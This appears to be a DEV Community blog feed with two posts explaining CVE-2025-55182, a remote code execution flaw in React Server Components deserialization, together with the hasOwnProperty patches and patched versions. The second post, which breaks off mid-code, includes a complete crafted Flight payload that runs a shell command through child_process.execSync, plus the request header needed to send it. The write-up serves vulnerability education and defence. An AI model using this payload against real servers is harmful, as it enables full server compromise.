DEV Community: Kavishcan Veerasaravanan The latest articles on DEV Community by Kavishcan Veerasaravanan (@jmmy). https://dev.to/jmmy https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F955072%2Fdadd0f41-ccbb-442e-baea-bc8acaf66cca.jpg DEV Community: Kavishcan Veerasaravanan https://dev.to/jmmy en CVE-2025–55182 Explained Simply Kavishcan Veerasaravanan Mon, 08 Dec 2025 11:01:10 +0000 https://dev.to/jmmy/cve-2025-55182-explained-simply-521c https://dev.to/jmmy/cve-2025-55182-explained-simply-521c <h2> The Complete Patch: All Three Critical Fixes </h2> <h3> Fix #1: Property Traversal in <code>getOutlinedModel()</code> (MOST CRITICAL) </h3> <p><strong>What was broken:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// VULNERABLE CODE</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">:</span><span class="dl">'</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">path</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">path</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span> <span class="nx">value</span> <span class="o">=</span> <span class="nx">value</span><span class="p">[</span><span class="nx">name</span><span class="p">];</span> <span class="c1">// NO CHECK - Can access __proto__, constructor, etc!</span> <span class="p">}</span> </code></pre> </div> <p><strong>The fix:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// PATCHED CODE</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">:</span><span class="dl">'</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">path</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">path</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span> <span class="c1">// CRITICAL FIX: Only access properties the object actually owns</span> <span class="k">if </span><span class="p">(</span><span class="k">typeof</span> <span class="nx">value</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">object</span><span class="dl">'</span> <span class="o">&amp;&amp;</span> <span class="nx">hasOwnProperty</span><span class="p">.</span><span class="nf">call</span><span class="p">(</span><span class="nx">value</span><span class="p">,</span> <span class="nx">name</span><span class="p">))</span> <span class="p">{</span> <span class="nx">value</span> <span class="o">=</span> <span class="nx">value</span><span class="p">[</span><span class="nx">name</span><span class="p">];</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">undefined</span><span class="p">;</span> <span class="c1">// Stop if property doesn't exist</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong>What this line does:</strong></p> <ul> <li> <strong><code>hasOwnProperty.call(value, name)</code></strong> - Checks if the property exists on THIS object (not inherited from prototype)</li> </ul> <p><strong>How it blocks the exploit:</strong></p> <ul> <li> <code>$1:__proto__:then</code> → Tries to access <code>__proto__</code> → <strong>BLOCKED</strong> (not own property)</li> <li> <code>$1:constructor:constructor</code> → Tries to access <code>constructor</code> → <strong>BLOCKED</strong> (not own property)</li> <li>Without prototype access, the entire exploit chain collapses</li> </ul> <h3> Fix #2: Module Export Access in <code>requireModule()</code> (Defense-in-Depth) </h3> <p><strong>What was broken:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// VULNERABLE CODE</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">requireModule</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">(</span><span class="nx">metadata</span><span class="p">:</span> <span class="nx">ClientReference</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">):</span> <span class="nx">T</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">moduleExports</span><span class="p">[</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]];</span> <span class="c1">// Can access prototype properties</span> <span class="p">}</span> </code></pre> </div> <p><strong>The fix:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// PATCHED CODE</span> <span class="k">if </span><span class="p">(</span><span class="nx">hasOwnProperty</span><span class="p">.</span><span class="nf">call</span><span class="p">(</span><span class="nx">moduleExports</span><span class="p">,</span> <span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]))</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">moduleExports</span><span class="p">[</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]];</span> <span class="p">}</span> <span class="k">return </span><span class="p">(</span><span class="kc">undefined</span><span class="p">:</span> <span class="nx">any</span><span class="p">);</span> <span class="c1">// Return undefined for prototype properties</span> </code></pre> </div> <p><strong>What this does:</strong></p> <ul> <li>Blocks access to inherited properties on module exports</li> <li>Not the main vulnerability, but good defense-in-depth</li> </ul> <h3> Fix #3: Error Handling in <code>decodeReplyFromBusboy()</code> </h3> <p><strong>What was broken:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// VULNERABLE CODE</span> <span class="nf">resolveField</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">name</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span> <span class="c1">// If this throws, server crashes</span> </code></pre> </div> <p><strong>The fix:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// PATCHED CODE</span> <span class="k">try</span> <span class="p">{</span> <span class="nf">resolveField</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">name</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">busboyStream</span><span class="p">.</span><span class="nf">destroy</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span> <span class="c1">// Safely handle errors</span> <span class="p">}</span> </code></pre> </div> <p><strong>What this does:</strong></p> <ul> <li>Prevents server crashes that could leak information</li> <li>Ensures graceful failure during exploitation attempts</li> </ul> <h2> Why The Fix Works: Breaking the Exploit Chain </h2> <p>The exploit required <strong>all these steps</strong> to work:</p> <ol> <li>Access <code>__proto__</code> via <code>$1:__proto__:then</code> → <strong>BLOCKED by Fix #1</strong> </li> <li>Get <code>Chunk.prototype.then</code> → <strong>BLOCKED by Fix #1</strong> </li> <li>Trigger second deserialization → Still works, but useless now </li> <li>Access Function constructor via <code>$1:constructor:constructor</code> → <strong>BLOCKED by Fix #1</strong> </li> <li>Execute malicious code → <strong>Can't reach this step anymore</strong> </li> </ol> <p><strong>Result:</strong> Single <code>hasOwnProperty</code> check breaks the entire chain.</p> <h2> Patched Versions </h2> <ul> <li> <strong>React:</strong> 19.0.1, 19.1.2, 19.2.1</li> <li> <strong>Next.js:</strong> 15.1.8, 15.1.9, 15.2.4, 15.3.2</li> </ul> <p><strong>Update immediately if you're using React Server Components or Next.js App Router.</strong></p> CVE-2025–55182 Explained Kavishcan Veerasaravanan Mon, 08 Dec 2025 09:21:50 +0000 https://dev.to/jmmy/cve-2025-55182-explained-2e85 https://dev.to/jmmy/cve-2025-55182-explained-2e85 <blockquote> <p>Credits: <a href="https://github.com/msanft/CVE-2025-55182" rel="noopener noreferrer">https://github.com/msanft/CVE-2025-55182</a> &amp; <a href="https://x.com/rauchg/status/1997362942929440937" rel="noopener noreferrer">https://x.com/rauchg/status/1997362942929440937</a></p> </blockquote> <h1> The Core Problem: Trusting Untrustworthy Data </h1> <p>React Server Components have a feature where the <strong>client (your browser) can send data back to the server</strong>. The vulnerability exists because React was <strong>deserializing this data without properly checking if it’s safe</strong>.</p> <h1> What is Deserialization? </h1> <p>Think of it like this:</p> <ul> <li> <strong>Serialization</strong> = packing data into a format for transport (like putting items in a box to ship)</li> <li> <strong>Deserialization</strong> = unpacking that data on the other end (opening the box)</li> </ul> <p>The problem is: <strong>what if someone puts a bomb in the box instead of your package?</strong></p> <h1> How the Attack Works </h1> <ol> <li> <strong>Attacker sends a malicious HTTP request</strong> to your React Server Components application</li> <li>The request contains specially crafted data disguised as normal RSC payload</li> <li> <strong>The server unpacks (deserializes) this data</strong> without validating it’s safe</li> <li>Hidden inside this data are <strong>instructions to execute code</strong> on the server</li> <li>The server runs this code, giving the attacker complete control</li> </ol> <h1> Let me break down this vulnerability using the actual React code and explain how the exploit chain works: </h1> <h2> The Flight Protocol &amp; Chunks </h2> <p>React Server Components use the <strong>Flight protocol</strong> to serialize data between client and server. Data is sent as “chunks” — pieces that can reference each other:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="c1">// Example of how chunks work normally</span> <span class="nx">files</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">["$1"]</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Array referencing chunk 1</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"object":"fruit","name":"$2:fruitName"}</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Object with reference to chunk 2</span> <span class="dl">"</span><span class="s2">2</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"fruitName":"cherry"}</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Actual data</span> <span class="p">}</span> <span class="c1">// This deserializes to:</span> <span class="p">{</span> <span class="na">object</span><span class="p">:</span> <span class="dl">'</span><span class="s1">fruit</span><span class="dl">'</span><span class="p">,</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">cherry</span><span class="dl">'</span> <span class="p">}</span> </code></pre> </div> <p>The <code>$</code> syntax means "reference another chunk". React resolves these references during deserialization.</p> <h2> The Vulnerability: Missing Property Check </h2> <p><strong>Before the patch</strong>, when React resolved chunk references, it didn’t verify if the property actually existed on the object. Here’s the vulnerable code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="c1">// VULNERABLE CODE (pre-patch)</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">requireModule</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">(</span><span class="nx">metadata</span><span class="p">:</span> <span class="nx">ClientReference</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">):</span> <span class="nx">T</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">moduleExports</span> <span class="o">=</span> <span class="nf">parcelRequire</span><span class="p">(</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">ID</span><span class="p">]);</span> <span class="k">return</span> <span class="nx">moduleExports</span><span class="p">[</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]];</span> <span class="c1">// NO CHECK IF PROPERTY EXISTS</span> <span class="p">}</span> </code></pre> </div> <p>This meant you could access <strong>prototype chain properties</strong> like <code>__proto__</code>, <code>constructor</code>, etc.</p> <h2> Step 1: Accessing the Function Constructor </h2> <p>An attacker can craft a payload that traverses the prototype chain to reach JavaScript’s <code>Function</code> constructor:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">files</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">["$1:__proto__:constructor:constructor"]</span><span class="dl">'</span><span class="p">,</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"x":1}</span><span class="dl">'</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>Breaking this down:</p> <ul> <li> <code>$1</code> → Get chunk 1 (which is <code>{"x":1}</code>)</li> <li> <code>:__proto__</code> → Access the object's prototype</li> <li> <code>:constructor</code> → Get <code>Object.constructor</code> </li> <li> <code>:constructor</code> → Get <code>Function.constructor</code> (which is the <code>Function</code> constructor itself)</li> </ul> <p>This deserializes to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">[</span><span class="nb">Function</span><span class="p">:</span> <span class="nb">Function</span><span class="p">]</span> </code></pre> </div> <h2> Step 2: The “Thenable” Trick </h2> <p>React’s code <strong>awaits</strong> the result of deserialization:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="c1">// action-handler.ts (pre-patch)</span> <span class="nx">boundActionArguments</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">decodeReplyFromBusboy</span><span class="p">(</span> <span class="nx">busboy</span><span class="p">,</span> <span class="nx">serverModuleMap</span><span class="p">,</span> <span class="p">{</span> <span class="nx">temporaryReferences</span> <span class="p">}</span> <span class="p">)</span> </code></pre> </div> <p>When you <code>await</code> an object that has a <code>.then()</code> method (called a "thenable"), JavaScript automatically calls that method. An attacker can create a chunk that sets <code>.then</code> to the Function constructor:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">files</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"then":"$1:__proto__:constructor:constructor"}</span><span class="dl">'</span><span class="p">,</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"x":1}</span><span class="dl">'</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>Now chunk 0 is an object with <code>.then</code> set to <code>Function</code>. When React awaits it, it calls <code>Function()</code>, which tries to create a new function!</p> <h2> Step 3: The Self-Referential Chunk (The Clever Part) </h2> <p>Here’s where it gets really tricky. React has a special syntax <code>$@</code> that returns the <strong>raw chunk object</strong> itself, not its resolved value:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="c1">// In React's code</span> <span class="k">case</span> <span class="dl">"</span><span class="s2">@</span><span class="dl">"</span><span class="p">:</span> <span class="k">return </span><span class="p">(</span> <span class="p">(</span><span class="nx">obj</span> <span class="o">=</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">value</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">2</span><span class="p">),</span> <span class="mi">16</span><span class="p">)),</span> <span class="nf">getChunk</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">obj</span><span class="p">)</span> <span class="c1">// Returns the Chunk object itself</span> <span class="p">);</span> </code></pre> </div> <p>React’s <code>Chunk</code> objects are thenables - they have a <code>.then()</code> method:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="c1">// React's Chunk implementation</span> <span class="nx">Chunk</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">then</span> <span class="o">=</span> <span class="nf">function </span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span> <span class="k">switch </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">status</span><span class="p">)</span> <span class="p">{</span> <span class="k">case</span> <span class="dl">"</span><span class="s2">resolved_model</span><span class="dl">"</span><span class="p">:</span> <span class="nf">initializeModelChunk</span><span class="p">(</span><span class="k">this</span><span class="p">);</span> <span class="c1">// This processes the chunk</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>An attacker creates a <strong>self-referential chunk</strong> that overwrites its own <code>.then()</code> with <code>Chunk.prototype.then</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">files</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"then": "$1:__proto__:then", "status": "resolved_model"}</span><span class="dl">'</span><span class="p">,</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">"$@0"</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// References the raw chunk 0</span> <span class="p">}</span> </code></pre> </div> <p>What happens:</p> <ol> <li>Chunk 0 sets its <code>.then</code> property to <code>Chunk.prototype.then</code> </li> <li>When React awaits chunk 0, it calls <code>Chunk.prototype.then</code> </li> <li>Since <code>status</code> is <code>"resolved_model"</code>, it calls <code>initializeModelChunk</code> </li> </ol> <h2> Step 4: The Second Deserialization Pass </h2> <p>Inside <code>initializeModelChunk</code>, React parses the <code>.value</code> property as JSON <strong>again</strong>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="kd">function</span> <span class="nf">initializeModelChunk</span><span class="p">(</span><span class="nx">chunk</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">rawModel</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">resolvedModel</span><span class="p">),</span> <span class="c1">// Parse .value as JSON</span> <span class="nx">value</span> <span class="o">=</span> <span class="nf">reviveModel</span><span class="p">(</span><span class="nx">chunk</span><span class="p">.</span><span class="nx">_response</span><span class="p">,</span> <span class="p">{</span> <span class="dl">""</span><span class="p">:</span> <span class="nx">rawModel</span> <span class="p">},</span> <span class="dl">""</span><span class="p">,</span> <span class="nx">rawModel</span><span class="p">,</span> <span class="nx">rootReference</span><span class="p">);</span> <span class="c1">// ... resolve references again</span> <span class="p">}</span> </code></pre> </div> <p>This gives the attacker a <strong>second pass</strong> at deserialization with more control, because they can now control the <code>chunk._response</code> object.</p> <h2> Step 5: The RCE Gadget — Blob Handling </h2> <p>React has code for handling blob data with the <code>$B</code> prefix:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">case</span> <span class="dl">"</span><span class="s2">B</span><span class="dl">"</span><span class="p">:</span> <span class="k">return </span><span class="p">(</span> <span class="p">(</span><span class="nx">obj</span> <span class="o">=</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">value</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">2</span><span class="p">),</span> <span class="mi">16</span><span class="p">)),</span> <span class="nx">response</span><span class="p">.</span><span class="nx">_formData</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nx">_prefix</span> <span class="o">+</span> <span class="nx">obj</span><span class="p">)</span> <span class="c1">// Calls .get()</span> <span class="p">);</span> </code></pre> </div> <p>The attacker crafts a fake <code>_response</code> object where:</p> <ul> <li> <code>_formData</code> points to the Function constructor</li> <li> <code>_prefix</code> contains their malicious code </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">crafted_chunk</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">then</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">$1:__proto__:then</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">status</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">resolved_model</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">reason</span><span class="dl">"</span><span class="p">:</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="dl">"</span><span class="s2">value</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"then": "$B0"}</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Triggers blob handling</span> <span class="dl">"</span><span class="s2">_response</span><span class="dl">"</span><span class="p">:</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">_prefix</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">process.mainModule.require('child_process').execSync('calc');</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">_formData</span><span class="dl">"</span><span class="p">:</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">get</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">$1:constructor:constructor</span><span class="dl">"</span><span class="p">,</span> <span class="c1">// Points to Function</span> <span class="p">},</span> <span class="p">},</span> <span class="p">}</span> </code></pre> </div> <p>When the blob code runs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">response</span><span class="p">.</span><span class="nx">_formData</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nx">_prefix</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">)</span> <span class="c1">// Becomes:</span> <span class="nc">Function</span><span class="p">(</span><span class="dl">"</span><span class="s2">process.mainModule.require('child_process').execSync('calc');0</span><span class="dl">"</span><span class="p">)</span> </code></pre> </div> <p>This creates a function containing the attacker’s code, which then gets called automatically because it’s returned as a <code>.then()</code> method that React awaits.</p> <h2> The Complete Exploit </h2> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="nx">crafted_chunk</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">then</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">$1:__proto__:then</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">status</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">resolved_model</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">value</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">{"then": "$B0"}</span><span class="dl">'</span><span class="p">,</span> <span class="dl">"</span><span class="s2">_response</span><span class="dl">"</span><span class="p">:</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">_prefix</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">process.mainModule.require('child_process').execSync('calc');</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">_formData</span><span class="dl">"</span><span class="p">:</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">get</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">$1:constructor:constructor</span><span class="dl">"</span><span class="p">,</span> <span class="p">},</span> <span class="p">},</span> <span class="p">}</span> <span class="nx">files</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">:</span> <span class="p">(</span><span class="nx">None</span><span class="p">,</span> <span class="nx">json</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="nx">crafted_chunk</span><span class="p">)),</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span><span class="p">:</span> <span class="p">(</span><span class="nx">None</span><span class="p">,</span> <span class="dl">'</span><span class="s1">"$@0"</span><span class="dl">'</span><span class="p">),</span> <span class="p">}</span> </code></pre> </div> <p>Send this as an HTTP POST request with header <code>Next-Action: foo</code> and the server will execute <code>calc</code> (or any command).</p> <h1> The Complete Patch: All Three Critical Fixes </h1> <p>According to Sebastian Markbage (React core team), there were actually <strong>two critical <code>hasOwnProperty</code> checks that were missing</strong>. The fix involves three key changes:</p> <h2> Fix #1: Property Traversal in <code>getOutlinedModel()</code> (MOST CRITICAL) </h2> <p>The most critical vulnerability was in the path traversal loop in <code>ReactFlightReplyServer.js</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// VULNERABLE CODE (pre-patch)</span> <span class="kd">function</span> <span class="nf">getOutlinedModel</span><span class="p">(</span><span class="cm">/* ... */</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// ... code ...</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">:</span><span class="dl">'</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">path</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">path</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span> <span class="nx">value</span> <span class="o">=</span> <span class="nx">value</span><span class="p">[</span><span class="nx">name</span><span class="p">];</span> <span class="c1">// NO CHECK - Can access __proto__, constructor, etc!</span> <span class="p">}</span> <span class="c1">// ... code ...</span> <span class="p">}</span> </code></pre> </div> <p>This loop takes references like <code>$1:__proto__:constructor:constructor</code> and blindly traverses the object path, allowing access to prototype chain properties.</p> <p><strong>THE FIX:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// PATCHED CODE</span> <span class="kd">function</span> <span class="nf">getOutlinedModel</span><span class="p">(</span><span class="cm">/* ... */</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// ... code ...</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">:</span><span class="dl">'</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">path</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">path</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span> <span class="c1">// CRITICAL FIX: Verify property exists on object itself</span> <span class="k">if </span><span class="p">(</span><span class="k">typeof</span> <span class="nx">value</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">object</span><span class="dl">'</span> <span class="o">&amp;&amp;</span> <span class="nx">hasOwnProperty</span><span class="p">.</span><span class="nf">call</span><span class="p">(</span><span class="nx">value</span><span class="p">,</span> <span class="nx">name</span><span class="p">))</span> <span class="p">{</span> <span class="nx">value</span> <span class="o">=</span> <span class="nx">value</span><span class="p">[</span><span class="nx">name</span><span class="p">];</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">undefined</span><span class="p">;</span> <span class="c1">// Stop traversal if property doesn't exist</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// ... code ...</span> <span class="p">}</span> </code></pre> </div> <p>As Sebastian Markbage noted: <em>"These hasOwnProperty checks were the ones that were missing. This is the critical fix. Without it, you can drill into objects not created by the parser itself."</em></p> <h2> Fix #2: Module Export Access in <code>requireModule()</code> (Important Defense-in-Depth) </h2> <p>In all the React Server DOM packages (<code>webpack</code>, <code>turbopack</code>, <code>parcel</code>, <code>esm</code>), the <code>requireModule</code> function was also vulnerable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// VULNERABLE CODE (pre-patch)</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">requireModule</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">(</span><span class="nx">metadata</span><span class="p">:</span> <span class="nx">ClientReference</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">):</span> <span class="nx">T</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">moduleExports</span> <span class="o">=</span> <span class="nf">__webpack_require__</span><span class="p">(</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">ID</span><span class="p">]);</span> <span class="k">return</span> <span class="nx">moduleExports</span><span class="p">[</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]];</span> <span class="c1">// access prototype properties</span> <span class="p">}</span> </code></pre> </div> <p><strong>THE FIX:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// PATCHED CODE</span> <span class="k">import</span> <span class="nx">hasOwnProperty</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">shared/hasOwnProperty</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">requireModule</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">(</span><span class="nx">metadata</span><span class="p">:</span> <span class="nx">ClientReference</span><span class="o">&lt;</span><span class="nx">T</span><span class="o">&gt;</span><span class="p">):</span> <span class="nx">T</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">moduleExports</span> <span class="o">=</span> <span class="nf">__webpack_require__</span><span class="p">(</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">ID</span><span class="p">]);</span> <span class="c1">// Verify the export actually exists on the module</span> <span class="k">if </span><span class="p">(</span><span class="nx">hasOwnProperty</span><span class="p">.</span><span class="nf">call</span><span class="p">(</span><span class="nx">moduleExports</span><span class="p">,</span> <span class="nx">metadata</span><span class="p">[</span><span 